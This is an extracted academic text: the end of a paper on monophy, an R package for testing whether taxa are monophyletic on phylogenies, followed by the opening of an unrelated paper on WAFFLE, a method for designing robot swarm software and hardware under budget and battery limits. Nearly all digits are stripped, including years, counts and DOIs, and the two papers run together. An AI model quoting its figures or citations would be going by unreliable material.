due to outliers. getoutliertips returns lists of tips that cause monophyly issues for their taxon by being outliers. getresultmonophyly returns an extended table of the results. getsummarymonophyly returns a summary table of the results. plotmonophyly allows several visualizations of the result. descendants of its mrca. if there are more descendants than taxon members, the function will identify and list the tips that do not belong to the focal taxon and we then call these tips ‘intruders.’ accordingly, we will further refer to the taxa whose monophyly was disrupted by these ‘intruders’ as ‘intruded.’ note that if two taxa are reciprocally disrupting each other’s monophyly, certain tips of intruded taxa will often be intruders themselves: if the phylogeny is ((a , b ), (a , b )), where a and b are genera, it is not clear if the a tips are intruding in b or the b tips are intruding in a. biologically, identifying a few intruders may suggest that the definition of a group should be expanded; observing some group members in very different parts of the tree than the rest of their taxon may instead suggest that these individuals were misidentified, that their placement is the result of contaminated sequences or due to horizontal gene transfer between members of two remote clades. moreover, the approach as described above would suggest that the clades that are intruded by the outlier tips would in turn be intruders to the taxon the outliers belong to, which intuitively would not make sense. we thus implemented an option to specify a cutoff value, which defines the minimal proportion of tips among the descendants of a taxon’s mrca that are labeled as being actual members of that taxon. if a given group falls below this value, the function will find the ‘core clade’ (a subclade for which the proportion matches or exceeds the cutoff value) by moving tipward, always following the descendant node with the greater number of tips in the focal taxon (absolute, relative if tied), and at each step evaluating the subtree rooted at that node to see if it exceeds the cutoff value. once such a subtree is found, it is then called the ‘core clade’, and taxon members outside this clade are then called ‘outliers’. as there is no objective criterion to decide at what point individuals should be considered outliers, a reasonable cutoff value must be chosen by the user. if the tree’s tip labels are in the format ‘genus_speciesepithet’, the genus names will be extracted and used as taxon assignments for the tips. if the tip labels are in another format, or other taxonomic levels should be tested, taxon names can be assigned to the tips using an input file. to avoid having to manually compose a taxonomy file for a taxon-rich phylogeny, monophy can automatically download desired taxonomic levels from itis or ncbi using taxize (chamberlain & szocs, ). schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure monophyly plot of the genera of ericaceae. close-up on subfamily vaccinioideae only. branches of the tree coloured according to monophyly status. we can see that vaccinium has two outliers and that its intruders are paphia, dimorphanthera, agapetes and gaylussacia. all inference results are stored in a solution object, from which the other functions can extract information (e.g., summary tables, intruder and outlier lists) for one or more higher-level taxa of interest. plotmonophyly reconstructs and plots the monophyly state of the tips using phytools (revell, ). apart from the basic monophyly plot (fig. ), branches can be coloured according to taxonomic groups or to highlight intruders and outliers. monophyletic groups can be collapsed and plots can be saved directly to pdf to facilitate the visualization of large trees. it is important to remember that the results produced by the package are merely the product of the used phylogeny and the available taxonomic information. it thus only makes the mismatches between those accessible, but does not reveal any more than that. the decision of whether the result suggests problems in the phylogeny or the taxonomy, whether a tip should be considered a rogue taxon and be removed or whether gene tree-species tree conflicts should be investigated, is entirely up to the user’s judgment. monophy is available through cran (https://cran.r-project.org/package=monophy/) and is developed on github (https://github.com/oschwery/monophy). intended extensions and fixes can be seen in the issues list of the package’s github page. among the planned extensions of the package are: multiple trees, displaying the result for specific subtrees, proposing monophyletic subgroups, enabling formal tests for monophyly (incorporating clade support) and providing increased plot customizability. examples our first example makes use of the example files contained in the package. they come from a phylogeny of the plant family ericaceae (schwery et al., pruned to species; for schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/package=monophy/ https://github.com/oschwery/monophy http://dx.doi.org/ . /peerj-cs. original data, see schwery et al., ) and two taxon files assigning tribes and subfamilies to the tips (in both files, errors have been introduced for demonstration purposes; see code and output for both examples in supplemental information ). running the main analysis command assessmonophyly on genus level (i.e., tree only) and tribe level (i.e., tree plus taxonomy file) using standard settings took . and . s respectively on a macbook pro with . ghz intel core i and gb ram. we could now use the remaining commands to extract the information of interest from the saved output object (e.g., summary tables, lists of problem taxa, etc.). the basic monophyly plot for the genus level analysis is displayed for a subclade of the tree in fig. (the figure of the full tree is shown in fig. s ). for the second example, we demonstrate the package’s performance on a tree of , species of embriophyta (zanne et al., ; data see zanne et al., ), using an outlier- cutoff of . this time. just checking monophyly for genera took . h, but revealed that % of genera on the tree are not monophyletic, while around half of all genera are only represented by one species each. furthermore, we can see that the largest monophyletic genus is iris ( tips), that justicia had the most intruders ( tips) and that acacia produced the most outliers ( tips). finally, with , other tips as descendants of their mrca, the species of aldina are most spread throughout the tree. citation researchers using monophy in a published paper should cite this article and indicate the used version of the package. the citation information for the current package version can be obtained using citation(‘‘monophy’’). acknowledgements we want to thank the members of the o’meara lab for helpful discussions, frederik matsen iv and two anonymous reviewers for well-considered criticism to improve the manuscript, brian looney and sam borstein for beta testing, and the members of the tank lab, arne mooers, karen cranston, bruce cochrane and daniel gates for great ideas on increasing the usefulness of this package. additional information and declarations funding this work has been supported via a gta to os by the university of tennessee, knoxville. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university of tennessee, knoxville. competing interests the authors declare there are no competing interests. schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. author contributions • orlando schwery conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials/analysis tools, and wrote the paper, prepared figures and tables, performed the computation work. • brian c. o’meara contributed materials/analysis tools, and wrote the paper. data availability the following information was supplied regarding data availability: cran: https://cran.r-project.org/package=monophy/ github: https://github.com/oschwery/monophy. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references avise jc, arnold j, ball rm, bermingham e, lamb t, neigel je, reeb ca, saunders nc. . intraspecific phylogeography—the mitochondrial-dna bridge between population-genetics and systematics. annual review of ecology and systematics : – doi . /annurev.es. . . . chamberlain sa, szocs e. . taxize: taxonomic search and retrieval in r. f research : – doi . /f research. - .v . coddington ja. . cladistic tests of adaptational hypotheses. cladistics : – doi . /j. - . .tb .x. czelusniak j, goodman m, hewettemmett d, weiss ml, venta pj, tashian re. . phylogenetic origins and adaptive evolution of avian and mammalian hemoglobin genes. nature : – doi . / a . dalevi d, desantis tz, fredslund j, andersen gl, markowitz vm, hugenholtz p. . automated group assignment in large phylogenetic trees using grunt: grouping, ungrouping, naming tool. bmc bioinformatics : . donoghue mj. . phylogenies and the analysis of evolutionary sequences, with examples from seed plants. evolution : – doi . / . felsenstein j. . confidence limits on phylogenies: an approach using the bootstrap. evolution : – doi . / . fitzjohn rg. . diversitree: comparative phylogenetic analyses of diversification in r. methods in ecology and evolution : – doi . /j. - x. . .x. gilinsky nl, good ij. . probabilities of origination, persistence, and extinction of families of marine invertebrate life. paleobiology : – . hey j. . using phylogenetic trees to study speciation and extinction. evolution : – doi . / . schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/package=monophy/ https://github.com/oschwery/monophy http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /annurev.es. . . http://dx.doi.org/ . /f research. - .v http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / a http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. larget b, simon dl. . markov chain monte carlo algorithms for the bayesian analysis of phylogenetic trees. molecular biology and evolution : – doi . /oxfordjournals.molbev.a . matsen f, gallagher a. . reconciling taxonomy and phylogenetic inference: formalism and algorithms for describing discord and inferring taxonomic roots. algorithms for molecular biology ( ): . mcdonald d, price mn, goodrich j, nawrocki ep, desantis tz, probst a, andersen gl, knight r, hugenholtz p. . an improved greengenes taxonomy with explicit ranks for ecological and evolutionary analyses of bacteria and archaea. isme journal : – doi . /ismej. . . neuwirth e. . rcolorbrewer: colorbrewer palettes. r package version . - . ed. paradis e, claude j, strimmer k. . ape: analyses of phylogenetics and evolution in r language. bioinformatics : – doi . /bioinformatics/btg . r development core team. . r: a language and environment for statistical comput- ing. vienna: r foundation for statistical computing. available at http://www.r- project.org/ . rabosky dl. . automatic detection of key innovations, rate shifts, and diversity- dependence on phylogenetic trees. plos one :e doi . /journal.pone. . revell lj. . phytools: an r package for phylogenetic comparative biology (and other things). methods in ecology and evolution : – doi . /j. - x. . .x. robinson df. . comparison of labeled trees with valency three. journal of combina- torial theory, series b : – doi . / - ( ) - . schliep kp. . phangorn: phylogenetic analysis in r. bioinformatics : – doi . /bioinformatics/btq . schwery o, onstein re, bouchenak-khelladi y, xing y, carter rj, linder hp. . data from: as old as the mountains: the radiations of the ericaceae. dryad digital repository doi . /dryad.t fg . schwery o, onstein re, bouchenak-khelladi y, xing y, carter rj, linder hp. . as old as the mountains: the radiations of the ericaceae. new phytologist : – doi . /nph. . shochat d, dessauer hc. . comparative immunological study of albumins of anolis lizards of the caribbean islands. comparative biochemistry and physiology a- physiology : – doi . / - ( ) - . sibley cg, ahlquist je. . the phylogeny and relationships of the ratite birds as indicated by dna-dna hybridization. in: evolution today. proceedings of the second international congress of systematic and evolutionary biology, – . zanne ae, tank dc, cornwell wk, eastman jm, smith sa, fitzjohn rg, mcglinn dj, o’meara bc, moles at, reich pb, royer dl, soltis de, stevens pf, westoby m, wright ij, aarssen l, bertin ri, calaminus a, govaerts r, hemmings f, leishman mr, oleksyn j, soltis ps, swenson ng, warman l, beaulieu jm. . three keys schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /oxfordjournals.molbev.a http://dx.doi.org/ . /oxfordjournals.molbev.a http://dx.doi.org/ . /ismej. . http://dx.doi.org/ . /bioinformatics/btg http://www.r-project.org/ http://www.r-project.org/ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /dryad.t fg http://dx.doi.org/ . /nph. http://dx.doi.org/ . /nph. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. to the radiation of angiosperms into freezing environments. nature : – doi . /nature . zanne ae, tank dc, cornwell wk, eastman jm, smith sa, fitzjohn rg, mcglinn dj, o’meara bc, moles at, reich pb, royer dl, soltis de, stevens pf, westoby m, wright ij, aarssen l, bertin ri, calaminus a, govaerts r, hemmings f, leishman mr, oleksyn j, soltis ps, swenson ng, warman l, beaulieu jm, ordonez a. . data from: three keys to the radiation of angiosperms into freezing environments. dryad digital repository doi . /dryad. q . . schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /dryad. q . http://dx.doi.org/ . /peerj-cs. submitted july accepted august published september corresponding author mauro birattari, mbiro@ulb.ac.be academic editor josé manuel galán additional information and declarations can be found on page doi . /peerj-cs. copyright salman et al. distributed under creative commons cc-by . open access concurrent design of control software and configuration of hardware for robot swarms under economic constraints muhammad salman, antoine ligot and mauro birattari iridia, université libre de bruxelles, brussels, belgium abstract designing a robot swarm is challenging due to its self-organized and distributed nature: complex relations exist between the behavior of the individual robots and the collective behavior that results from their interactions. in this paper, we study the concurrent automatic design of control software and the automatic configuration of the hardware of robot swarms. we introduce waffle, a new instance of the automode family of automatic design methods that produces control software in the form of a probabilistic finite state machine, configures the robot hardware, and selects the number of robots in the swarm. we test waffle under economic constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. experimental results obtained via realistic computer-based simulation on three collective missions indicate that different missions require different hardware and software configuration, and that waffle is able to produce effective and meaningful solutions under all the experimental conditions considered. subjects adaptive and self-organizing systems, agents and multi-agent systems, artificial intelligence, robotics keywords swarm robotics, automatic design, collective behaviors, concurrent design introduction in this paper, we make a two-fold contribution: (i) we address the concurrent automatic design of control software and the automatic configuration of the hardware; and (ii) we study an automatic design problem that is subject to economic constraints. in swarm robotics (Şahin, ), a group of robots coordinate to accomplish missions that a single robot cannot accomplish. in a swarm, robots do not have predefined roles, neither do they possess any global information, nor do they rely on external infrastructures (dorigo, birattari & brambilla, ). they operate in a decentralized and self-organized manner, relying only on local information gathered through their sensors or communicated by their neighboring peers. a robot swarm is a collective entity and cannot be programmed directly: the designer must program the individual robots so that, together, they perform the desired mission. the design process is laborious due to the complex relation existing between the behavior of the individual robots and the collective behavior that results from their interactions (brambilla et al., ). the most common approach to designing a robot swarm is trial-and-error: a time consuming approach in which individual-level behaviors are implemented, tested, and modified until how to cite this article salman m, ligot a, birattari m. . concurrent design of control software and configuration of hardware for robot swarms under economic constraints. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:mbiro@ulb.ac.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the desired swarm-level behavior is obtained. although a number of swarms have been successfully designed with this approach, it heavily depends on the experience of designer, it is error-prone, and its results are not reproducible. to overcome these issues, a number of principled manual design methods have been proposed. however, these methods are limited in scope: a universal swarm design methodology does not exist, yet (hamann & wörn, ; lopes et al., ; brambilla et al., ). automatic design is an alternative approach to designing a swarm. in automatic design, the design problem is formulated as an optimization problem that is then solved with an optimization algorithm (birattari et al., ). a design problem of a collective mission is expressed as an objective function, a mathematical equation that measures the performance of the robot swarm. an optimization algorithm steers the search for a control software of an individual-robot that maximizes the performance of the swarm, taking into account the constraints such as hardware limitations of the robots or other environmental restrictions, that are encoded in the form of additional (in)equalities. neuro-evolutionary robotics is the most studied among the existing automatic design approaches to design a swarm (trianni, ). this approach uses an evolutionary algorithm to optimize the control software of robots that, in this case, is represented by an artificial neural network (nolfi & floreano, ). recently, a number of automatic design approaches have been proposed that use different control software structures and optimization algorithms than those typically adopted in evolutionary swarm robotics (francesca et al., ). the concurrent development of control software and hardware is a further step to reduce the human involvement in the design process. a number of concurrent design methods have been proposed for single-robot applications: in addition to designing the control software, they select and configure sensors and actuators and/or the robot’s morphology (sims, ; lipson & pollack, ). these concurrent design methods have significantly increased the performance and versatility of the designed robots. in swarm robotics, only a few research articles have been published that studied the concurrent automatic design of control software and configuration of the hardware (watson & nitschke, ). details are provided in the state of the art section. in general, designing implies solving trade-offs, that is, balancing multiple, possibly conflicting factors (pahl et al., ). in swarm robotics, a characterizing example of a trade-off to be handled is the one between the number of robots comprised in the swarm and the capabilities of each individual robot. the designer must decide whether, for the specific mission at hand, they should use (i) few highly capable robots or (ii) many relatively incapable ones. this trade-off originates from the constraint of a limited monetary budget. indeed, it is reasonable to assume that highly capable robots are more expensive than relatively incapable ones. another example of a design trade-off originates if the designer is given the constraint of adopting a battery of a predefined capacity. under this constraint, the designer might chose to adopt (i) robots with powerful sensors and actuators that can achieve relatively more per unit time, but have a high power consumption and therefore can operate for a relatively short amount of time; or (ii) simpler robots that can achieve relatively less per unit time but have a low power consumption and therefore can operate salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for a relatively long amount of time. it is reasonable to expect that the choice might depend on the specific mission at hand. in this research, we introduce waffle, a new instance of the automode family of automatic design methods. all previously published instances of automode generate control software for the e-puck platform (mondada et al., ) by selecting, combining, and fine-tuning predefined, mission-independent software modules (francesca et al., ; francesca et al., ; kuckling et al., ; hasselmann, robert & birattari, ). waffle is based on chocolate (francesca et al., ). indeed, regarding the conception of control software, waffle is identical to chocolate: the two methods share the same predefined software modules, they combine these modules into the same control software architecture, and they use the same optimization algorithm—details are given in the automode- waffle section. the novelty of waffle is the concurrent hardware configuration of the robot swarm: waffle automatically selects the hardware configuration of the individual robots and the number of robots within the swarm. the goal of this research is to show that it is possible to concurrently design the control software and configure the hardware for robot swarm using the principles of automatic modular design: the idea that control software and, in our particular case the hardware, can be produced by combining pre- existing modules that are mission independent and that are assembled and fine tuned automatically. in this specific study, we consider some hypothetical hardware modules that enable a robot to detect and locate its neighboring peers. these hypothetical modules are based on infrared transceivers and are variants of an existing hardware module for the e-puck platform (mondada et al., ) known as the range-&-bearing (gutiérrez et al., ). we define the set of these hypothetical modules so that some of them are more-capable and some are less-capable than the existing one in terms of perception range and detection abilities. we assume that the more capable hardware modules are more expensive and consume more power. these hypothetical modules are realistic and possibly implementable. the fact that they are hypothetical (except one) does not impair the significance of our research. indeed, our goal is not to solve a specific design problem but rather to show that a modular approach to designing by optimization can search the space of possible hardware configurations concurrently with the automatic design of control software. we study waffle under what we shall collectively call economic constraints, namely, constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. if these constraints were not included, the study would produce trivial results in many cases. indeed, in many cases, the automatic design process would produce swarms comprising the largest number of robots possible, each equipped with the best performing, most expensive, and most energy-consuming hardware modules. besides preventing that the study produces trivial results, these constraints have a value on their own. indeed, in a prospective practical application of automatic design, one will be necessarily faced with economic constraints, which are an essential, unavoidable element of any real-world design problem. to the best of our knowledge, this study is the first one in which automatic design of robot swarms is studied under constraints of economical nature. in this sense, our work contributes to moving a step in the direction of the practical application of automatic design. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the main research question that we address in this paper is the following: can waffle select mission-specific hardware together with an appropriate control software? to do so, we test waffle on three different collective missions: end-time-aggregation, anytime- selection, and foraging. for each mission, we impose constraints to the design process. namely, we impose a monetary budget and/or a battery capacity. for each mission, we perform nine different experiments: (i) one experiment in which both monetary budget and battery capacity are unconstrained (no-constraint), (ii) two experiments with different levels of the monetary budget and unconstrained battery capacity (monetary-constraint), (iii) two experiments with different levels of battery capacity and unconstrained monetary budget (power-constraint), and (iv) four experiments with different levels of monetary budget and battery capacity (monetary-&-power-constraint). for each experiment, we report and discuss (i) a measure of the performance achieved, (ii) the number of robots comprised in the automatically designed swarm, (iii) which hardware modules have been automatically selected, and (iv) which software modules were adopted. state of the art in the literature, a number of approaches have been proposed to address the concurrent design of single robots. however, only a few preliminary studies have been published that implement the simultaneous design of hardware and control software for a robot swarm. in single robot applications, sims ( ) introduced what he called virtual creatures: simulated robots whose body and control software are designed simultaneously to perform different tasks, such as walking, jumping, and swimming. the body of these robots is composed of solid cuboid segments connected by different joint types, actuators to simulate muscle force at joints, and various sensors. the body of a robot is represented as a directed-graph of nodes and connections that contain the connectivity information and developmental instructions. the control software of the robot is implemented as an artificial neural network. a genetic algorithm was used to concurrently design the software and the hardware of a robot for a particular task. the development of virtual creatures demonstrated the ability of this approach to design complex systems that would be complicated to design using traditional methods. lipson & pollack ( ) took this concept to a further level by introducing the automatic manufacturing of the concurrently designed robot. the authors used the rapid prototyping technology to d print the robot once its body (variable-length bars, and ball-and-socket joints) and control software (artificial neural network) is automatically designed in the simulation. in recent studies, much work has been conducted using similar approaches that aim to address various design problems, e.g., robots with insect-like hardware topologies and behaviors (hornby, lipson & pollack, ); visually guided robots (macinnes, ); aquatic robots (clark et al., ); self-reconfiguring robot (nygaard et al., ). in swarm robotics, only a couple of studies are available that use concurrent design methods to design a robot swarm. watson & nitschke ( ) studied the impact of the number of sensors and their position on the robot to select the minimal sensor configuration of individual robot for a collective construction task. they achieved that by manually salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. selecting six different sensors configurations and generating six instances of control software in the form of artificial neural networks using hyperneat. hewland & nitschke ( ) used neat-m to configure the number and types of sensors simultaneously with the control software for the robots in a swarm for collective construction task. moreover, they also designed the control software for a robot swarm with fixed hardware configuration. according to the authors, the concurrently designed swarm performed relatively better than the swarm with fixed hardware configuration. heinerman, rango & eiben ( ) studied the relationship between individual and social learning in physical robot swarms. the authors used six thymio ii robots in their experiments. the study shows that the on-line social learning in a physical robot swarm is possible, the design process is faster than individual learning, and the performance of the produced control software (artificial neural networks) is higher. moreover, the design process also configures a suitable sensory layout for individual robots. various computational models have been proposed to estimate the impact of the size/density of the robot swarm on its performance (lerman & galstyan, ; hamann, ). however, we are not aware of any study in which the automatic selection of the number of robots for a swarm has been attempted. to the best of our knowledge, the implications of imposing economical constraints to the automatic design of a robot swarm have never been studied. we are only aware of a single study that goes into that direction: recently, carlone & pinciroli ( ) included some practical constraints in the design of a robot swarm. they formulate the co-design of a single race-drone and multi-drone system as a binary optimization problem that allows specifying constraints such as the total design budget. automode-waffle as already mentioned above, waffle belongs to automode, a family of off-line automatic methods for designing the control software of robot swarms (francesca et al., ). in automode, control software is generated by automatically assembling predefined modules and by fine-tuning their free parameters. a number of methods have been proposed that belong to automode: vanilla (francesca et al., ), chocolate (francesca et al., ), gianduja (hasselmann, robert & birattari, ), and maple (kuckling et al., ). each of these methods is characterized by a specific set of predefined modules, a software architecture into which these modules can be combined, and an optimization algorithm that searches the space of the possible ways in which modules can be combined into the given architecture and the space of the free parameters. all the aforementioned methods generate control software for a specific version of the e-puck platform (mondada et al., ). moreover, they all limit themselves to the generation of control software: the hardware configuration of the e-puck robot is fixed and the number of robots comprised in the swarm is given as a requirement of the mission to be performed. waffle is a further step to increase the flexibility of automode and to reduce the human involvement in the design process. indeed, waffle concurrently develops the control software and configures the hardware of the robot swarm—including the number salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table low-level behaviors and conditions used in waffle. low-level behaviors exploration the robot moves straight. if an obstacle is detected, the robot rotates in place for a random amount of time before moving straight again stop the robot does not move phototaxis the robot moves towards the light, if perceived; otherwise, it moves straight anti-phototaxis the robot moves away from the light, if perceived; otherwise, it moves straight attractiona the robot moves towards peers within its perception range repulsiona the robot moves away from peers within its perception range conditions black-floor black floor is detected gray-floor gray floor is detected white-floor white floor is detected neighbor-counta the number of peers in neighborhood is greater than a parameter inverted-neighbor-counta the number of peers in neighborhood is less than a parameter fixed-probability the transition is enabled with a fixed probability notes. abehaviors and conditions that use the range-&-bearing module. of robots comprised. regarding the design of control software, waffle is identical to chocolate (francesca et al., ): the two methods share the same set of pre-defined software modules; generate control software in the form of probabilistic finite state machines; and use the iterated f-race optimization algorithm (lópez-ibáñez et al., ) to select, combine, and fine-tune the software modules. the set of software modules is composed of six low-level behaviors and six conditions (francesca et al., ). a behavior is an operation or action that a robot can perform, while a condition is a criterion to switch from one behavior to another. behaviors and conditions have parameters that impact their internal functioning: automode fine-tunes these parameters to the specific mission to be performed. multiple instances of the same behavior might coexist in a probabilistic finite state machine, possibly with different values of the parameters. in waffle (as in chocolate), states and edges of a probabilistic finite state machine are instances of behaviors and conditions, respectively. the design process can include a maximum of four states and each state can have at most four outgoing edges. a brief description of the software modules is given in table and a typical probabilistic finite state machine is shown in fig. . regarding the hardware, waffle uses iterated f-race to define the configuration of the individual e-puck robots and their number within the swarm. the e-puck is a differential drive robot that is widely used in swarm robotics research (mondada et al., ). waffle and all previous instances of automode operate with an extended version of the e-puck robot, which adopts: (i) the overo gumstix, to run linux salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a typical probabilistic finite state machine automatically designed by waffle: states and conditions are represented by circles and diamonds, respectively. initially the robot moves towards its neighboring peers (attraction state)—the robot follows a direction vector and att = . is the attraction parameter that defines the magnitude of the vector. when it detects the black floor, it stops. the param- eter p is the probability of transition from one state to another when the condition is true. we refer the reader to francesca et al. ( ) for further details. full-size doi: . /peerjcs. /fig- on the robot, (ii) three ground sensors, located under its body, to detect the gray-level color of the floor beneath it, and (iii) a range-&-bearing module (gutiérrez et al., ) to detect neighboring peers and have knowledge of their relative position. we simulate the e-puck robots using argos (pinciroli et al., ; garattoni et al., ), an open source multi-engine simulator for robot swarm. we use argos’ d dynamic physics engine to simulate the robots and the environment. here, we assume that e-puck robots are formally described by reference model rm . (hasselmann et al., ), which defines the input and output variables of corresponding sensors and actuators—see table . these variables can be read/written by the control software at every control step, that is, every ms. the control software detects the obstacles (proxi) and the presence and relative position of a light source (light i) using eight infrared transceivers. it also detects the gray-level color of the floor (groundj) beneath the robot using ground sensors. at every control step, all robots in the swarm broadcast a ‘‘heartbeat’’ signal using their range-&-bearing module. this signal encodes the sender’s unique id. every robot receives the heartbeat signals of the peers that are in its perception range and has therefore knowledge of their number (n), and of their aggregate relative position (v ) which is defined as: v =   n∑ m= ( +rm , bm ) , if robots are perceived; ( , ), otherwise. ( ) here, rm and bm are the range and bearing of the mth neighboring peer, respectively. for a detailed description of the vector v and of how it is computed, see salman, ligot & birattari ( ). eventually, the control software actuates the wheels of the robot by setting the right and left wheel velocity (vr and vl). salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table reference model rm . . sensor input value description proximity proxi∈{ ,..., } [ , ] reading of proximity sensor i light light i∈{ ,..., } [ , ] reading of light sensor i ground groundj∈{ , , } {black,gray,white} reading of ground sensor j range-&-bearing n [ , ] number of neighboring robots perceived v ([ . , ],[ , π]) their aggregate position actuator output value description motors vk∈{l,r} [− . , . ] ms− target linear wheel velocity as mentioned above, the goal of this research is to concurrently develop the control software and configure the hardware for the robot swarm. concerning the hardware configuration, waffle configures the range-&-bearing transceiver modules of e-puck robots. to do so, we simulate six range-&-bearing receivers and two range-&-bearing transmitters as listed in table . these range-&-bearing modules are hypothetical but are variants of one that actually exists (gutiérrez et al., ): receiver r rb coupled with transmitter t rb, as defined in table . each hypothetical range-&-bearing receiver and transmitter has distinct characteristics. a receiver is characterized by an error modeled as white noise in the estimation of the angle of a broadcasting peer (bearing error), and a probability to fail to receive the signal broadcast by a robot in its perception range (loss probability). the bearing error is sampled at every time step from a uniform distribution. the loss probability is a function of the number of neighboring peers—details are given as supplementary material (salman, ligot & birattari, ). a range-&-bearing transmitter is characterized by a tunable infra-red transmission range (r)—see table . if the design process finds the range-&-bearing necessary for a mission, it can equip all the robots with one of the receiver and of the transmitter configurations listed in table . in configuring the hardware of the robot swarm, the design process must also respect the available monetary budget and/or a battery capacity. indeed, the range-&-bearing receivers and transmitters are also characterized by price and current rating—see table . experimental setup in this section, we describe the three collective missions, the experiments we perform for each mission, and the protocol we follow to test waffle. missions we test waffle on three missions: anytime-selection, end-time-aggregation, and foraging. all three missions are to be performed in a dodecagonal arena of . m . the arena is divided into different zones according to the requirements of a mission. anytime-selection and end-time-aggregation are performed in the same arena—as shown in fig. a. at the beginning of every experimental run, we randomly position the robots everywhere in the arena. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table extended range-&-bearing receiver and transmitter modules. the bearing error is modeled as white noise in the estimation of the bearing of a broadcasting peer and is sampled from a uniform proba- bility distribution, of which we list here the extremes of the support. the loss probability is a function of the number of neighboring peers, of which we list here the minimum, average, and maximum values. range-&-bearing bearing error loss probability price current rating receivers rxrb ± deg min−avg −max px (€) ix (ma) ∅ − − r rb . − . − . r rb . − . − . r rb . − . − . r rb . − . − . r rb . − . − . r rb . − . − . , range-&-bearing range price current rating transmitters tyrb r (m) py (€) iy(r) (ma) ∅ − t rb { . , . , . } { , , } t rb { . , . } { , } figure argos representation of arenas with dimensions and positions of different zones: (a) end- time-aggregation and anytime-selection, and (b) foraging. measurements are expressed in me- ters. in foraging, l represents a light source. full-size doi: . /peerjcs. /fig- anytime-selection the robot swarm must aggregate in one of the two circular black zones. the size of two black zones and their position in the arena are given in fig. a. the performance of the swarm is measured by the following objective function: fa= t∑ t= ∣∣(na(t)−nb(t))∣∣, ( ) salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where na(t) and nb(t) are the number of robots in zone a and b at any time t; t is the total duration of the experiment. in anytime-selection, the performance is measured at every control step. due to this reason, the robots are expected to promptly aggregate in one of the black zones and stay there until the end of the experiment. end-time-aggregation the robots must aggregate in one of the two black zones. the dimensions of two black zones and their position in the arena are given in fig. a. the performance of the robot swarm is measured with the following objective function: fe = ∣∣na(t)−nb(t)∣∣, ( ) where t is the duration of an experiment and na(t) and nb(t) are the number of robots in zone a and zone b at time t . unlike anytime-selection, the performance in end-time-aggregation is computed at the end of the experiment. due to this reason, the robots can take some time to explore the arena and converge in a black zone: the experiment duration is not a significant constraint in this mission. however, the real challenge is to keep the robots assembled in a zone until the end of the experiment. foraging the swarm must collect a maximum number of objects from two sources and drop them in the nest. we abstract the foraging experiment by considering that an object is retrieved when an individual robot visits a source, and an object is dropped when a robot visits the nest. the two sources in the arena are represented as two black zones, while the nest is represented as a white zone. a light is also placed behind the nest as a cue for robots. the dimensions and position of the two source zones and nest are given in fig. b. the performance of the robot swam, the number of objects (no) retrieved by the swarm, is expressed by the following objective function: ff =no. ( ) in foraging, an individual robot can retrieve a single object at a time. therefore, the performance of the swarm heavily rely on the number of robots and on the duration of the experiment. experiments we perform nine different experiments for each mission. in these experiments, we impose a monetary budget and/or a battery capacity constraints to the design process. depending on the type of constraint, an experiment can be classified as belonging to one of four categories: no-constraint, monetary-constraint, power-constraint, and monetary-&- power-constraint. the levels of the monetary constraint, levels of battery capacity, and duration of the experiments are listed in table . for each experiment, the design process is free to choose any number of robots between and . salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table monetary budget levels, battery capacity levels and duration of all nine experiments of four categories. the duration of an experiment, t , from categories power-constraint and monetary-&-power- constraint is not fixed. the experiment terminates, when all robots are out of battery—as defined in eq. ( ). experiment category monetary budget battery capacity duration nc no-constraint unconstrained unconstrained s m , € unconstrained s m monetary constraint , € unconstrained s p unconstrained mah t p power constraint unconstrained mah t m p , € mah t m p , € mah t m p , € mah t m p monetary & power constraint , € mah t no-constraint this experiment (nc) is performed without any constraint: the monetary resources and battery capacity are unconstrained. 